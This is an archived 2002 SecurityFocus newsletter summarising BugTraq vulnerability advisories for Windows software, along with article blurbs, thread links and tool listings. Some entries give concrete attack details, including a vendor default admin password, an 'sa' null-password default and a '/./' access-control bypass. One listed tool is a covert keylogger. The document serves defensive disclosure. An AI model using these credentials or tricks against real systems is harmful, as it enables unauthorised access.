SecurityFocus Microsoft Newsletter #88

From: Marc Fossi (mfossi@securityfocus.com)
Date: 05/28/02

Previous message: Rocky Stefano: "RE: How to disable WebDAV"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 28 May 2002 13:07:46 -0600 (MDT)
From: Marc Fossi <mfossi@securityfocus.com>
To: Focus-MS <focus-ms@securityfocus.com>

SecurityFocus Microsoft Newsletter #88
--------------------------------------

This newsletter is sponsored by SecurityFocus (www.securityfocus.com)

Attention Non-profits and Universities: Sign-up now for preferred pricing
on the only global early-warning system for cyber attacks - SecurityFocus
ARIS Threat Management System.

Click here for more info
http://www.securityfocus.com/corporate/products/pdpsection.shtml

-------------------------------------------------------------------------------

I. FRONT AND CENTER
     1. No Stone Unturned, Part Four
     2. Securing Microsoft Services
     3. The Viral Mind: Understanding the Motives of Malicious Coders
     4. Black Hat Briefings
     5. Security Hole Strip Tease
II. MICROSOFT VULNERABILITY SUMMARY
     1. Nullsoft Winamp Plaintext Authentication Credentials Vulnerability
     2. BannerWheel Remote Buffer Overflow Vulnerability
     3. Deerfield WebSite Pro 8.3 Filename Source Disclosure Vulnerability
     4. Hosting Controller Browse.ASP File Disclosure Vulnerability
     5. Hosting Controller Default Administrative Account Vulnerability
     6. Matu FTP Server Buffer Overflow Vulnerability
     7. NewAtlanta ServletExec/ISAPI Path Disclosure Vulnerability
     8. NewAtlanta ServletExec/ISAPI File Disclosure Vulnerability
     9. Microsoft MSDE/SQL Server 2000 Desktop Engine Default...
     10. Ipswitch IMail Server LDAP Buffer Overflow Vulnerability
     11. NewAtlanta ServletExec/ISAPI JSPServlet Denial Of Service...
     12. Ethereal DNS Dissector Infinite Loop Denial of Service...
     13. Ethereal GIOP Dissector Memory Exhaustion Vulnerability
     14. SSH Communications Secure Shell Server AllowedAuthentications...
     15. YoungZSoft CMailServer Buffer Overflow Vulnerability
     16. Ethereal Server Message Block Dissector Malformed Packet...
     17. ViewCVS Cross-Site Scripting Vulnerability
     18. OpenBB BBCode Cross Agent HTML Injection Vulnerability
     19. OpenBB Unauthorized Moderator Access Vulnerability
     21. Microsoft Active Directory Zero Page Length Query Vulnerability
     22. Ethereal X11 Dissector Buffer Overflow Vulnerability
     23. OpenBB Cross-Site Scripting Vulnerability
     24. LocalWEB2000 File Disclosure Vulnerability
     25. Microsoft Excel 2002 XML Style*** Arbitrary Code Execution...
III. MICROSOFT FOCUS LIST SUMMARY
     1. Q320206 and SP4 (Thread)
     2. Q320206 and SP4 (Thread)
     3. No browsing group (Thread)
     4. Hfnetchk scans every file (Thread)
     5. No browsing group (Thread)
     6. IIS 5.0 and Netscape Authentication (Thread)
     7. SQL Spider question (Thread)
     8. Hfnetchk scans every file (Thread)
     9. hotfix overwrite; hfnetchk (Thread)
     10. IIS 5.0 and Netscape Authentication (Thread)
     11. SQL Spider. (Thread)
     12. About ping request? (Thread)
     13. MS02-18 causes Exchange problems ?? (Thread)
     14. SecurityFocus Microsoft Newsletter # 87 (Thread)
     15. About ping request? (Thread)
     16. Hotfixes overwritten? (Thread)
IV. MICROSOFT PRODUCTS
     1. Sanitizer
     2. InsideOut Firewall Reporter
     3. Stronghold Enterprise
V. MICROSOFT TOOLS
     1. Zebedee 2.4.0
     2. File::Scan v0.26
     3. ProBot SE v2.4.0
     4. MIMEDefang v2.11
VI. SPONSORSHIP INFORMATION

I. FRONT AND CENTER
-------------------
1. No Stone Unturned, Part Four
By H. Carvey

This is the fourth installment of a five-part series describing the
(mis)adventures of a sysadmin named Eliot and his haphazard journey in
discovering "the Way" of incident response.

http://online.securityfocus.com/infocus/1584

2. Securing Microsoft Services
by Mark Burnett

Shut off unnecessary services. It is sound advice that is preached in just
about every security book, checklist, or training class. But all too often
the advice ends there, leaving systems administrators to wonder what
exactly is an unnecessary service and how best to shut it off. Sure, it’s
easy enough to click on "Administrative tools" then "Services" to view the
available services. And it's easy to double-click a service you do not use
and set the "Startup Type" to disabled. But is there more to securing
services than just that?

http://online.securityfocus.com/infocus/1581

3. The Viral Mind: Understanding the Motives of Malicious Coders
by D. D. Shelby

Over the years I have seen many people offer opinions on why virus writers
do what they do. While I accept that many of these people have indeed
spoken to a small number of malware authors, it has become all too
apparent that much of their text has been based on opinion and not fact.
In this article, I will draw upon my own experiences as a virus writer and
as a member of the virus (and anti-virus) community to explore some of the
reasons that people would devote their time to developing viruses.

http://online.securityfocus.com/infocus/1583

4. Black Hat Briefings

Attend Black Hat Briefings & Training, July 29 - August 1, Las Vegas, the
world's premier technical security event! 8 tracks, 12 training sessions,
Richard Clarke keynote, 500 delegates from 30 nations, with a near cult
following of both CSOs and "underground" security experts. See for
yourself what the buzz is all about.

http://www.blackhat.com

5. Security Hole Strip Tease
By Tim Mullen

By letting the public catch a tantalizing peek at unannounced security
holes, one prolific bug-finder turns up the heat on vendors to close them.

http://online.securityfocus.com/columnists/84

II. BUGTRAQ SUMMARY
-------------------
1. Nullsoft Winamp Plaintext Authentication Credentials Vulnerability
BugTraq ID: 4781
Remote: No
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4781
Summary:

Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and
other filetypes.

A problem has been discovered which may potentially cause the HTTP
authentication credentials for streaming content to be exposed.

A user's authentication credentials for streaming content will be stored
in plaintext by Winamp. The credentials are stored in the file
'winamp.ini' under the [HTTP-AUTH] and [winamp] headings.

Local attackers may exploit this situation to gain access to the
credentials for streaming content that has been accessed by that user.

This issue was reported for Nullsoft Winamp 2.80. Other versions may also
be affected.

2. BannerWheel Remote Buffer Overflow Vulnerability
BugTraq ID: 4782
Remote: Yes
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4782
Summary:

BannerWheel is a freely available ad banner rotation program. It runs on
most Unix and Linux variants as well as Microsoft Windows operating
systems.

A condition has been reported in BannerWheel which may lead to arbitrary
code execution or a denial of service.

Due to insufficient bounds checking of externally supplied data,
BannerWheel may be prone to a buffer overflow condition. It may be
possible for an attacker to overwrite stack variables (including the
return address) with attacker-supplied instructions.

If exploitable, this condition may allow a remote attacker to execute
arbitrary instructions with the privileges of the webserver process.

3. Deerfield WebSite Pro 8.3 Filename Source Disclosure Vulnerability
BugTraq ID: 4783
Remote: Yes
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4783
Summary:

Deerfield WebSite Pro is a commercial webserver for Microsoft Windows
operating systems.

32bit Microsoft Windows operating systems support long filenames, but also
offer a means of backwards compatibility with the older 8.3 short
filenames required by previous versions of DOS and Windows.

Deerfield WebSite Pro is prone to a vulnerability which is the result of
how requests for files using the 8.3 short filenames are handled.

In particular, this issue occurs when the software attempts to serve files
with extensions which are at least four characters long (such as .shtml),
but are requested using the 8.3 short filenames. When the short filename
is used in the request, the software will fail to call the correct handler
for the extension. The effect is that the requested file will not be
interpreted.

An attacker may exploit this issue to disclose script source code.

4. Hosting Controller Browse.ASP File Disclosure Vulnerability
BugTraq ID: 4778
Remote: Yes
Date Published: May 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4778
Summary:

Hosting Controller is an application which consolidates all hosting tasks
into one interface. Hosting Controller runs on Microsoft Windows
operating systems.

The 'browse.asp' script is prone to an issue which may allow a remote
attacker to view the contents of arbitrary files and directories. The
attacker must provide the location of the targetted file or directory as a
value for the 'FilePath' URL parameter of the script in a malicious web
request. A file or directory specified through the browse.asp script
would be viewed with the permissions of the web server process.

It should be noted that the underlying webserver will normally be running
with SYSTEM level privileges.

5. Hosting Controller Default Administrative Account Vulnerability
BugTraq ID: 4779
Remote: Yes
Date Published: May 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4779
Summary:

Hosting Controller is an application which consolidates all hosting tasks
into one interface. Hosting Controller runs on Microsoft Windows
operating systems.

Hosting Controller installs with the default account 'AdvWebadmin'. This
account is installed with the default password 'advcomm500349'. The
Hosting Controller software does not prompt the administrator to change
the password or remove this account.

This problem may make it possible for remote attackers to abuse this
default administrative account to gain access to the server.

6. Matu FTP Server Buffer Overflow Vulnerability
BugTraq ID: 4792
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4792
Summary:

Matu FTP Server is a freely available FTP server for Microsoft Windows 95
and 98 operating systems.

It has been reported that an exploitable buffer overrun condition exists
in Matu FTP. The overflow condition is due to the handling of user input.

Reportedly, the overrun will occur if an excessively long argument is
submitted to the server.

An attacker exploiting this vulnerability may overwrite stack variables
including the return address, possibly to execute arbitrary code. The
attacker may also crash the service by sending excessive amounts of data
that has not specifically been designed to cause code execution.

This issue has been reported in Matu FTP Server 1.13. Other versions may
also be affected.

7. NewAtlanta ServletExec/ISAPI Path Disclosure Vulnerability
BugTraq ID: 4793
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4793
Summary:

ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS.
It runs with IIS on Microsoft Windows NT/2000/XP systems.

ServletExec/ISAPI discloses the absolute path to the webroot directory
when sent a specially formatted request without a trailing filename.

Specifically, if the class 'com.newatlanta.servletexec.JSP10Servlet' is
invoked without the trailing filename, then an error page will be
displayed with the path to wwwroot.

This type of sensitive information may aid in further attacks against the
vulnerable host.

8. NewAtlanta ServletExec/ISAPI File Disclosure Vulnerability
BugTraq ID: 4795
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4795
Summary:

ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS.
It runs with IIS on Microsoft Windows NT/2000/XP systems.

ServletExec/ISAPI will disclose the contents of arbitrary files within the
webroot directory.

For this to occur, the 'com.newatlanta.servletexec.JSP10Servlet' class
must be invoked followed by URL encoded directory traversal sequences and
the name of the file to be disclosed. While this will cause the software
to serve files within wwwroot that normally would not be served, it does
not appear possible to exploit this condition to break out of the webroot.

This condition is due to lack of sufficient validation of external data
supplied to the JSPServlet. This may result in the disclosure of sensitive
information.

9. Microsoft MSDE/SQL Server 2000 Desktop Engine Default Configuration Vulnerability
BugTraq ID: 4797
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4797
Summary:

Microsoft Data Engine (MSDE) and Microsoft SQL Server 2000 Desktop Engine
can be deployed with various applications as a database server. A
configuration error exists which could compromise a host running
applications based on these components.

It has been reported that the services are configured with a default
username of 'sa' and a null administrative password. Remote attackers may
exploit this flaw to gain administrative access to the database if the
default password has not been changed.

It should be noted that a worm attempting to exploit default, null,
passwords in Microsoft SQL server and derived products, including MSDE and
SQL Server 2000 Desktop Engine, is currently propagating through the
Internet.

10. Ipswitch IMail Server LDAP Buffer Overflow Vulnerability
BugTraq ID: 4780
Remote: Yes
Date Published: May 20 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4780
Summary:

Ipswitch IMail is an e-mail server that serves clients their mail via a
web interface. It runs on Microsoft Windows operating systems.

IMail ships with a LDAP server to enable remote clients to have read
access to the IMail directory.

The IMail LDAP component is prone to a remotely exploitable buffer
overflow condition, allowing attackers to execute arbitrary
attacker-supplied instructions.

The overflow is known to occur when an overly long string is provided as a
"bind DN" during authentication. It is possible to exploit this condition
to overwrite stack variables, such as the return address, with arbitrary
instructions. In this manner, a remote attacker may leverage this
vulnerability to execute arbitrary code.

IMail normally runs in the SYSTEM context, meaning that successful
exploitation will result in a full compromise of the underlying system.

It should be noted that this condition may also be exploited to trigger a
denial of service.

11. NewAtlanta ServletExec/ISAPI JSPServlet Denial Of Service Vulnerability
BugTraq ID: 4796
Remote: Yes
Date Published: May 22 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4796
Summary:

ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS.
It runs with IIS on Microsoft Windows NT/2000/XP systems.

The JSPServlet encounters difficulties when handling overly long requests.
If the JSPServlet is sent an overly long request directly or is invoked
via a long request for a JSP file, a denial of service condition will
occur.

It has been reported that this will cause the underlying webserver to
crash.

This condition may be the result of insufficient bounds checking, which
may allow an attacker to execute arbitrary code. This possibility has not
been confirmed.

12. Ethereal DNS Dissector Infinite Loop Denial of Service Vulnerability
BugTraq ID: 4807
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4807
Summary:

Ethereal is a freely available, open source network traffic analysis tool.
It is maintained by the Ethereal Project and is available for most Unix
and Linux variants as well as Microsoft Windows operating systems.

The Ethereal DNS dissector is a mechanism for decoding the DNS protocol.
A condition exists where the DNS dissector routine may enter an infinite
loop while processing a request. This may be triggered by a maliciously
constructed DNS query transmitted across the network. A remote attacker
may exploit this vulnerability to prevent Ethereal from functioning.

Successful exploitation may result in data loss and evasion of detection
by Ethereal.

13. Ethereal GIOP Dissector Memory Exhaustion Vulnerability
BugTraq ID: 4808
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4808
Summary:

The Ethereal GIOP dissector is a mechanism for decoding the General
Inter-ORB Protocol (GIOP). A condition exists that may result in
exhaustion of available memory. A specially constructed packet may cause
allocation of a large amount of memory. Attackers may exploit this
vulnerability to cause an exhaustion of available memory.

Successful exploitation may result in Ethereal failing or crashing.

14. SSH Communications Secure Shell Server AllowedAuthentications Configuration Overriding Vulnerability
BugTraq ID: 4810
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4810
Summary:

Secure Shell is the commercial SSH implementation distributed and
maintained by SSH Communications. It is available for the Unix, Linux,
and Microsoft Windows platforms.

A problem with some SSH servers may allow remote users to authentication
using arbitrary methods. The problem is in the handling of authentication
types specified via configuration.

SSH Servers allow an administrator to specify modes of authentication via
the server configuration file. Through the "AllowedAuthentications"
parameter, an administrator may limit the means of authentication used by
remote users.

Under some circumstances, it may be possible for a remote user to bypass
the "AllowedAuthentications" specified in the server configuration. This
could allow a user to authenticate using a different or weaker means, such
as a password. In such a situation where stronger authentication
protocols are in place, and system user accounts have been secured with
weak passwords, an attacker may be able to gain access to the system using
the weak password, rather than the strong authentcation scheme.

This problem makes it possible for remote users to circumvent
authentication mechanisms and, potentially, use a weaker method of
authentication.

15. YoungZSoft CMailServer Buffer Overflow Vulnerability
BugTraq ID: 4789
Remote: Yes
Date Published: May 21 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4789
Summary:

CMailServer is an mail server program for Microsoft Windows systems. It
is maintained by YoungZSoft.

It has been reported that an exploitable buffer overrun condition exists
CMailServer. The overflow condition is due to a lack of proper bounds
checking when processing client input. The overrun will occur if an
excessively long argument to the USER command is sent to the server.

This issue has been reported in CMailServer 3.30. Other versions may also
be affected.

16. Ethereal Server Message Block Dissector Malformed Packet Denial Of Service Vulnerability
BugTraq ID: 4806
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4806
Summary:

The Ethereal Server Message Block (SMB) dissector is a mechanism for
decoding the Microsoft SMB protocol. A problem with this portion of
Ethereal could make it possible for a remote attacker to deny service to
an Ethereal user.

Two conditions exists that may result in attempts to dereference NULL
pointers. The conditions may be triggered by a specially constructed SMB
packet transmitted across the network by the attacker. By transmitting
such a packet while a session of Ethereal is running, Ethereal could be
made to dereference a NULL pointer, resulting in a crash of the
application.

Successful exploitation may result in Ethereal crashing due to an access
violation, resulting in a denial of service.

17. ViewCVS Cross-Site Scripting Vulnerability
BugTraq ID: 4818
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4818
Summary:

ViewCVS is an open-source web interface for CVS. It is available for most
Unix and Linux variants as well as Microsoft Windows operating systems.

ViewCVS does not filter HTML tags from certain URL parameters, making it
prone to cross-site scripting attacks.

An attacker may exploit this by constructing a malicious link with script
code to a site running ViewCVS and sending it to a legitimate user of the
site. When the legitimate user follows the link, the attacker's script
code is executed in their web client in the security context of the
website running ViewCVS.

The attacker may be able to steal cookie-based authentication credentials
or hijack web content as a result of this vulnerability.

This vulnerability is similar to the issue discussed in BugTraq ID 4171.
The vulnerability discussed in BugTraq ID 4171 was fixed in OpenBB 1.0.0
RC3, however this issue bypasses the fix provided in 1.0.0 RC3.

18. OpenBB BBCode Cross Agent HTML Injection Vulnerability
BugTraq ID: 4819
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4819
Summary:

OpenBB is web forum software written in PHP. It will run on most Linux and
Unix variants, in addition to Microsoft Windows operating systems.

OpenBB version 1.0.0 RC3 is reportedly vulnerable to HTML injection
attacks. The vulnerability occurs in the file lib/codeparse.php which
replaces HTML code with BBCodes.

OpenBB uses 'BBCodes' in the place of HTML code to include images, links
etc. This is meant for HTML functionality without being suceptible to
malicious users. However, HTML tags are not adequately replaced with
BBCodes. It is possible to inject arbitrary HTML code into forum messages.
As a result, OpenBB is prone to cross-agent scripting attacks. Script code
will be executed in the browser of the user viewing the forum message and
may allow an attacker to steal cookie-based authentication credentials.

19. OpenBB Unauthorized Moderator Access Vulnerability
BugTraq ID: 4823
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4823
Summary:

OpenBB is web forum software written in PHP. It will run on most Linux and
Unix variants, in addition to Microsoft Windows operating systems.

OpenBB is reported to be vulnerable to a condition that will allow an
unauthorized user to gain moderator or administrative access to forums.

The attacker can only change a few options as follows:

- Open or close a forum
- To toggle sticky mode status of a forum
- To toggle significant mode status of a forum

This will allow an attacker to effectively cause significant, if not all,
parts of the forum to be closed.

20. Microsoft MSN Messenger Malformed Invite Request Denial of Service
BugTraq ID: 4827
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4827
Summary:

MSN Messenger is an instant messenging client for Microsoft Windows
systems, based on the Passport system.

A vulnerability has been reported in some versions of MSN Messenger. Under
some circumstances, it may be possible to crash a target client when it
receives a malformed invite request. By including a number of
HTML-encoded space characters (%20) in the Invitation-Cookie field, and
sending the header to a remote user, it is reportedly possible to crash a
remote user's client.

Exploitation of this vulnerability may result in a denial of MSN service.
The possibility of other consequences, such as code execution, has not yet
been ruled out. This record will be updated as more information becomes
available.

21. Microsoft Active Directory Zero Page Length Query Vulnerability
BugTraq ID: 4804
Remote: Yes
Date Published: May 23 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4804
Summary:

Microsoft Active Directory is reportedly vulnerable to a query that will
result in Active Directory to no longer respond.

The vulnerability has been reported for querying Active Directory servers
using Kerberos V authentication via GSS-API (Generic Security Standard
Application Programming Interface).

Active Directory servers, by default, return as many entries as possible
when responding to requests. A LDAP client is able to specify the number
of entries to be retrieved by setting page length to a smaller number.
The reported vulnerability occurs when the page length value is set to
zero and the client makes a large request. This will cause the vulnerable
Active Directory server to hang causing a denial of service to occur.

22. Ethereal X11 Dissector Buffer Overflow Vulnerability
BugTraq ID: 4805
Remote: Yes
Date Published: May 19 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4805
Summary:

The Ethereal X11 dissector is a mechanism for decoding the X11 protocol. A
buffer overflow exists when processing X11 key symbols, or 'keysyms'. It
is possible for an attacker to construct a packet that will, when decoded
by Ethereal, trigger the overflow condition.

Successful exploitation of this vulnerability may result in the attacker
gaining access to the ethereal host.

23. OpenBB Cross-Site Scripting Vulnerability
BugTraq ID: 4824
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4824
Summary:

OpenBB is web forum software written in PHP. It will run on most Linux and
Unix variants, in addition to Microsoft Windows operating systems.

It has been reported that OpenBB is vulnerable to a cross-site scripting
attack.

The vulnerability is present in the 'myhome.php' script. OpenBB does not
properly santize client-supplied value of certain parameters prior to
output. Attackers are able to circumvent existing measures to protect
against cross- site scripting attacks with the use of '<form>' tags
followed by arbitrary HTML.

Attackers may exploit this vulnerability by constructing a link to one of
these scripts containing malicious script code. If the link is sent to an
OpenBB user and clicked on, the attacker-supplied script code will run in
the context of the user's OpenBB session. The script code may obtain
cookie values or perform unauthorized actions as the victim user.

24. LocalWEB2000 File Disclosure Vulnerability
BugTraq ID: 4820
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4820
Summary:

LocalWEB2000 is a web server for Microsoft Windows operating systems.

A vulnerability exists in LocalWEB2000 related to content password
protection. It is possible to have LocalWEB2000 treat files as
unprotected by requesting them as files within the '.' (current)
directory. If the file http://server/file.txt is set to be password
protected, the protection will be bypassed if a request is made for
http://server/./file.txt. This is likely due to a design error in the
protection component.

This vulnerability was reported for LocalWEB2000 Standard Version 2.1.0.
Other versions (such as the Professional Edition) may also be affected by
this issue.

25. Microsoft Excel 2002 XML Style*** Arbitrary Code Execution Vulnerability
BugTraq ID: 4821
Remote: Yes
Date Published: May 24 2002 12:00A
Relevant URL:
http://www.securityfocus.com/bid/4821
Summary:

A vulnerability exists in the handling of XML stylesheets in Microsoft
Excel documents. This vulnerability may result in script contained in an
XML style*** to execute on a user's system.

With Microsoft Excel 2002, it is possible to include XML stylesheets with
XML documents. When such a document is loaded, the user is given the
choice to load the associated style*** or not. If the XML style***
contains script (ie.Javascript & VBscript modules), and the user chooses
to apply the style*** when viewing the .xls file, the script will run.
There is no indication to the user that embedded script will execute. By
default, the XML style*** is not loaded.

Successful exploitation of this vulnerability could lead to the execution
or malicious code on a user's system.

III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Q320206 and SP4 (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/0AF9D2420B808D43A1F6296DDBC40A3101CFDF@moc1.moc.local

2. Q320206 and SP4 (Thread)
Relevant URL:

761DBCC144B6334A81251171C684A6FB7CEB56@mailserver-2k.fireapple.com">http://online.securityfocus.com/archive/88/761DBCC144B6334A81251171C684A6FB7CEB56@mailserver-2k.fireapple.com

3. No browsing group (Thread)
Relevant URL:

OF851A20DD.EA63B673-ON85256BC2.000249E3@sbcs.com">http://online.securityfocus.com/archive/88/OF851A20DD.EA63B673-ON85256BC2.000249E3@sbcs.com

4. Hfnetchk scans every file (Thread)
Relevant URL:

1691923937205.20020522170620@planb-security.net">http://online.securityfocus.com/archive/88/1691923937205.20020522170620@planb-security.net

5. No browsing group (Thread)
Relevant URL:

5.1.0.14.2.20020523004345.00aca3f0@pop.legolas.com">http://online.securityfocus.com/archive/88/5.1.0.14.2.20020523004345.00aca3f0@pop.legolas.com

6. IIS 5.0 and Netscape Authentication (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/3D6694DB1788D311BA3E00508B5DFFE7036F935D@aklmessage01

7. SQL Spider question (Thread)
Relevant URL:

http://online.securityfocus.com/archive/88/01a101c201c3$765ca9f0$0b0aa8c0@baserem2

8. Hfnetchk scans every file (Thread)
Relevant URL:

20020522185018.20398.qmail@securityfocus.com">http://online.securityfocus.com/archive/88/20020522185018.20398.qmail@securityfocus.com

9. hotfix overwrite; hfnetchk (Thread)
Relevant URL:

C8D4A7339214BF43B80473E27549EABB14E900@LRSSP6.lrsinc.org">http://online.securityfocus.com/archive/88/C8D4A7339214BF43B80473E27549EABB14E900@LRSSP6.lrsinc.org

10. IIS 5.0 and Netscape Authentication (Thread)
Relevant URL:

F210jpWkfb81IfpT8vW00007254@hotmail.com">http://online.securityfocus.com/archive/88/F210jpWkfb81IfpT8vW00007254@hotmail.com

11. SQL Spider. (Thread)
Relevant URL:

5.1.0.14.2.20020521132947.0343a6f8@mail.hammerofgod.com">http://online.securityfocus.com/archive/88/5.1.0.14.2.20020521132947.0343a6f8@mail.hammerofgod.com

12. About ping request? (Thread)
Relevant URL:

0e6e210a@peregrine.com">http://online.securityfocus.com/archive/88/01cc01c200d7$1acbfce0$0e6e210a@peregrine.com

13. MS02-18 causes Exchange problems ?? (Thread)
Relevant URL:

OF0155A9FF.849E0A5D-ON85256BC0.004F57D4@sbcs.com">http://online.securityfocus.com/archive/88/OF0155A9FF.849E0A5D-ON85256BC0.004F57D4@sbcs.com

14. SecurityFocus Microsoft Newsletter # 87 (Thread)
Relevant URL:

Pine.LNX.4.43.0205210750360.23979-100000@mail.securityfocus.com">http://online.securityfocus.com/archive/88/Pine.LNX.4.43.0205210750360.23979-100000@mail.securityfocus.com

15. About ping request? (Thread)
Relevant URL:

EDF560E8C1E4A0439EA7828DDC95AFDF66C17B@nt-cleopsapp44.ntl-city.com">http://online.securityfocus.com/archive/88/EDF560E8C1E4A0439EA7828DDC95AFDF66C17B@nt-cleopsapp44.ntl-city.com

16. Hotfixes overwritten? (Thread)
Relevant URL:

811723221351.20020520092104@planb-security.net">http://online.securityfocus.com/archive/88/811723221351.20020520092104@planb-security.net

IV.NEW PRODUCTS FOR MICROSOFT PLATFORMS
---------------------------------------
1. Sanitizer
by Infraworks, Corp.
Platforms: DOS
Relevant URL:
http://www.infraworks.com/sanitizer.html
Summary:

Sanitizer is a patented (Registered U.S. Patent #6,212,600) data overwrite
technology designed to completely eliminate all data and all programs,
including the operating system. It completely erases clean every sector,
cluster, byte, and bit without damaging the hard drive.

2. InsideOut Firewall Reporter
by Stonylake Solutions
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Relevant URL:
http://www.stonylakesolutions.com/insideout.asp
Summary:

InsideOut Firewall Reporter is an easy to use, powerful, real time,
browser based reporting application for firewall logs. It provides over
150 useful reports. Windows and Linux versions available. Visit the site
for a live demo.

3. Stronghold Enterprise
by C2Net Software
Platforms: BSDI, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, SCO,
Solaris, SunOS, True64 UNIX, Unixware
Relevant URL:
http://www.redhat.com/software/apache/stronghold/
Summary:

Red Hat's Stronghold Enterprise is the most mature Apache-based web server
available today with over seven years of development and more than 14,000
servers running it to protect their data (E-Softs Security Space Web
Server Survey). Stronghold provides the tools to quickly install and
configure the popular Apache Web Server with the security features that
customers and business partners expect when they interact with your site.

V. MICROSOFT TOOLS
-------------------
1. Zebedee 2.4.0
by Neil Winton, zebedee@winton.org.uk
Relevant URL:
http://www.winton.org.uk/zebedee/
Platforms: UNIX, Windows 95/98, Windows NT
Summary:

Zebedee is a simple program to establish an encrypted, compressed "tunnel"
for TCP/IP or UDP data transfer between two systems. This allows traffic
such as telnet, FTP, and X to be protected from snooping as well as
potentially gaining performance over low-bandwidth networks from
compression. The main goals for Zebedee are to provide full client and
server functionality under both UNIX and Windows 95/98/NT, to be easy to
install, use, and maintain with little or no configuration required, and
to use only algorithms that are either unpatented or for which the patent
has expired.

2. File::Scan v0.26
by Henrique Dias hdias@aeiou.pt
Relevant URL:
http://www.cpan.org/authors/id/H/HD/HDIAS/
Platforms: N/A
Summary:

File::Scan allows users to make multiplataform virus scanners which can
detect Windows/DOS/Mac viruses. It include a virus scanner and signatures
database.

3. ProBot SE v2.4.0
by NetHunter Group support@nethunter.cc
Relevant URL:
http://www.nethunter.cc/probotse.php
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:

ProBot SE is a workstation monitoring and keylogging suite. This software
generates the detailed event log that is kept securely in binary files.
These files may be later referred by the system administrator or computer
owner for the exact reconstruction of the computer usage. ProBot SE
remains undetected even under the most prying eyes. It is invisible both
in Windows 9x/ME Ctrl+Alt+Del List and Windows NT process list.

4. MIMEDefang v2.11
by David F. Skoll dfs@roaringpenguin.com
Relevant URL:
http://www.roaringpenguin.com/mimedefang/
Platforms: Linux, Perl (any system supporting perl), UNIX
Summary:

MIMEDefang is a flexible MIME e-mail scanner designed to protect Windows
clients from viruses. It can alter or delete various parts of a MIME
message according to a very flexible configuration file. It can also
bounce messages with unnaceptable attachments. MIMEDefang works with
Sendmail 8.11's new "Milter" API, which gives it much more flexibility
than procmail-based approaches.

VI. SPONSORSHIP INFORMATION
---------------------------
This newsletter is sponsored by SecurityFocus (www.securityfocus.com)

Attention Non-profits and Universities: Sign-up now for preferred pricing
on the only global early-warning system for cyber attacks - SecurityFocus
ARIS Threat Management System.

Click here for more info
http://www.securityfocus.com/corporate/products/pdpsection.shtml

-------------------------------------------------------------------------------

Previous message: Rocky Stefano: "RE: How to disable WebDAV"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]